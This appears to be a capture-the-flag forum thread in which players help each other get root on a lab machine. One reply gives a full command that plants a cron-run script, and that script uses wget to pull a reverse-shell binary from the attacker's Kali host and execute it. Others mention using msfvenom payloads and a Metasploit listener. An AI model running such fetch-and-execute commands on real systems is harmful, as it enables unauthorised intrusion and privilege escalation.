Immerser
Immerser
Bronze IIhi kevin1 I didn't go the metasploit route on this one but you're going to need to change the cronjob within the initial foothold shell when you are www-data. Run the command echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh in the www-data meterpreter session and that will privesc the second meterpreter session to root
(hope that makes sence!)
Bronze IIHi, unfortunately I'm no further forward, Metasploit didn't accept that command. Still just getting Kali after whoami. Please can some tech wizard on here show me the light 😁?! Thanks 🤞
Bronze IIHave you created shell.elf to call back to the correct kali ip?
Are you hosting that file on a http server the whole time?
Do you have a listener open on the port you specified in msfvenom?
Bronze IIHi, I've left the www-data metasploit tab and the wget command tab open that got me the token for answer 4. Tab 3, I used the reverse shell msfvenom command followed by the sudo python command. Tab 4, set up the Metasploit listener with using multi/handler. In the fifth tab, I ran the echo command (as this echo command doesn't seem to work within Metasploit as advised above). Thanks in advance folks
Bronze IICan you send some screenshots of the msfvenom command, python http server command and the listener?